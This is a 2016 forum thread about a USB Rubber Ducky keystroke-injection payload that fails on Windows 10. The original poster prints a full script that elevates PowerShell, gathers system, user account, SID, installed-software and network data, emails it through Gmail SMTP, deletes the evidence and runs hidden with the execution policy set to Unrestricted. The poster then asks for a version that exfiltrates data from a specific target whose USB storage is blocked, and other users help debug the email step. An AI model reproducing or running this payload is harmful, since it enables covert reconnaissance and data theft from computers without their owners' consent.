FULLAUTO Posted April 10, 2016 Share Posted April 10, 2016 Iam damn frustrated with that Rubber Ducky, it wont work in Windows 10 I tried the Payload generator, i made it work, but it wont send email and ftp upload wont work under Windows 10 neither... I dont get an email and i dont get the uploads to FTP, everything is correct, is there possibility that the Rubber Ducky scripts wont support Windows 10 anymore? Even SAVE to Target machine wont work, used an administrator account. Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted April 10, 2016 Share Posted April 10, 2016 Could you post your ducky script? Keep in mind the online generators may need tweaking to get it to work. Quote Link to comment Share on other sites More sharing options...
FULLAUTO Posted April 11, 2016 Author Share Posted April 11, 2016 (edited) DELAY 750 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 750 ALT j DELAY 750 ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $SysBootTime = Get-WmiObject Win32_OperatingSystem ENTER STRING $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime ENTER STRING $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME) ENTER STRING $SerialNo = $SysSerialNo.SerialNumber ENTER STRING $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model ENTER STRING $SysManufacturer = $SysInfo.Manufacturer ENTER STRING $SysModel = $SysInfo.Model ENTER STRING $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption ENTER STRING $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'" ENTER STRING $HD = [math]::truncate($disk.Size / 1GB) ENTER STRING $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB) ENTER STRING $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize ENTER STRING $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB) ENTER STRING $SysCpu = Get-WmiObject Win32_Processor | Select Name ENTER STRING $Cpu = $SysCpu.Name ENTER STRING $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber ENTER STRING $HardSerialNo = $HardSerial.SerialNumber ENTER STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name ENTER STRING $graphicsCard = gwmi win32_VideoController |select Name ENTER STRING $graphics = $graphicsCard.Name ENTER STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1 ENTER STRING $DriveLetter = $CDDrive.Drive ENTER STRING $DriveName = $CDDrive.Caption ENTER STRING $Disk = $DriveLetter + '' + $DriveName ENTER STRING $Firewall = New-Object -com HNetCfg.FwMgr ENTER STRING $FireProfile = $Firewall.LocalPolicy.CurrentProfile ENTER STRING $FireProfile = $FireProfile.FirewallEnabled ENTER STRING $Report = $Report + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>" ENTER STRING $UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired ENTER STRING $UserType = $UserInfo.AccountType ENTER STRING $UserSid = $UserInfo.SID ENTER STRING $UserPass = $UserInfo.PasswordRequired ENTER STRING $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator') ENTER STRING $Report = $Report +"<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>" ENTER STRING $Report = $Report + '</div>' ENTER STRING $Report = $Report + '<div id=center><h3> Installed Programs</h3> ' ENTER STRING $Report = $Report + (Get-WmiObject -class Win32_Product | ConvertTo-html Name, Version,InstallDate) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $Report = $Report + '<div id=center><h3>Network Information</h3>' ENTER STRING $Report = $Report + (Get-WmiObject Win32_NetworkAdapterConfiguration -filter 'IPEnabled= True' | Select Description,DNSHostname, @{Name='IP Address ';Expression={$_.IPAddress}}, MACAddress | ConvertTo-Html) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('USERNAME was here!!!', 'PASSWORD was here!!'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'mydamnemail@gmail.com' ENTER STRING $ReportEmail.To.Add('mydamnemail@gmail.com') ENTER STRING $ReportEmail.Subject = 'Duck Toolkit Recon Report' ENTER STRING $ReportEmail.Body = 'Please find attached your reconnaissance report.' ENTER STRING $ReportEmail.Attachments.Add('C:\Windows\Report.zip') ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING remove-item 'C:\Windows\Report.zip' ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 750 STRING C:\Windows\config-e702b.ps1 ENTER DELAY 750 ALT F4 DELAY 750 GUI r DELAY 750 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 750 ALT j DELAY 750 STRING mode con:cols=14 lines=1 ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 750 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER Could you post your ducky script? Keep in mind the online generators may need tweaking to get it to work. where i have ALT j it was ALT Y before, i translated it to german keyboard layout I dont know what CTRL S stands for, cant find something related via Google... And: If i run this Script on a computer with a non Administrator Account (Not guest) it wont work because of the "run AS" correct? Edited April 11, 2016 by FULLAUTO Quote Link to comment Share on other sites More sharing options...
Guest Posted April 13, 2016 Share Posted April 13, 2016 (edited) About the email not being received: since mid 2015 or so Google has made a change to their mailservers so that less secure apps can no longer sign in to gmail. And Google thinks your cmd box is a less secure app ;) The solution is to change a setting in your gmail account to allow less secure apps to sign in to your mailbox. You will find this setting here: https://www.google.com/settings/security/lesssecureapps After changing this the mail option will work. This is a very long script you have and difficult to troubleshoot. Next time try to isolate the part that is not working and go through the script manually: type in every command manually. This way you can see where it goes wrong. In this case there would have been an error right after: $SMTPInfo.Send($ReportEmail) The error would have been: The smtp server requires a secure connection or the client was not authenticated. The server response was: 5.5.1 Authentication Required. Edited April 13, 2016 by Guest Quote Link to comment Share on other sites More sharing options...
FULLAUTO Posted April 13, 2016 Author Share Posted April 13, 2016 (edited) In this case there would have been an error right after: $SMTPInfo.Send($ReportEmail) The error would have been: The smtp server requires a secure connection or the client was not authenticated. The server response was: 5.5.1 Authentication Required. Hi, thanks for your answer, but i already set the Option you said, didnt work....i try several options and report back If it helps you, i will tell you what i need, its simple: The Computer to be attacked runs Windows 7 I need a script which saves the following comands tasklist net user ipconfig -all and this command which saves all the installed programs @echo off REM Reference: http://www.techrepublic.com/forum/questions/101-215911/dos-command-to-list-all-installed-programs echo ================= >>software_list.txt reg export HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall temp1.txt find "DisplayName" temp1.txt| find /V "ParentDisplayName" > temp2.txt for /f "tokens=2,3 delims==" %%a in (temp2.txt) do (echo %%a >> software_list.txt) del temp1.txt del temp2.txt REM type software_list.txt | more echo. echo. echo Installed software are stored in software_list.txt and if its possible to send the txt files to my email as on the computer where i want to use it the USB port is blocked for mass storage devices no need of any HTML or shit like that, just a txtfile with this infos Edited April 13, 2016 by FULLAUTO Quote Link to comment Share on other sites More sharing options...
Guest Posted April 13, 2016 Share Posted April 13, 2016 I can only guess what's going wrong. It would be helpful if you can be more specific what's wrong. Tell me, if you insert the Ducky into the target machine, do you see anything happening on the screen at all? You know the machine has to be logged in for this to work, right? Quote Link to comment Share on other sites More sharing options...
FULLAUTO Posted April 14, 2016 Author Share Posted April 14, 2016 I will make a video on weekend and show you guys whats wrong Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.